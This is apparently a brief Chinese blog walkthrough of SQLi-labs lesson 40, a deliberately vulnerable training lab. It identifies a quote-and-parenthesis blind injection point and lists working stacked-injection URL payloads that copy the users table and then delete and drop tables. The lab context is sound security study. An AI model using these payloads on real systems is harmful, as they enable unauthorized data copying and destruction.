Sqli labs less 40

1.输入正确的参数,网页回显正常的信息。使用单引号闭合,网页无回显。

Sqli labs less 40

 

 2.把后面的信息注释掉,网页仍然返回错误信息。测试以下所有语句,测试得出此处是单引号和括号闭合的字符型盲注。

Sqli labs less 40

 

 3.堆叠注入

?id=1');CREATE TABLE WhiteMoon LIKE users;--+
?id=1');INSERT INTO WhiteMoon SELECT * FROM users;--+
?id=1');DELETE FROM WhiteMoon;--+
?id=1');DROP TABLE WhiteMoon;--+

Sqli labs less 40

 

上一篇:php中的正则表达式


下一篇:Spring boot读取application.properties中文乱码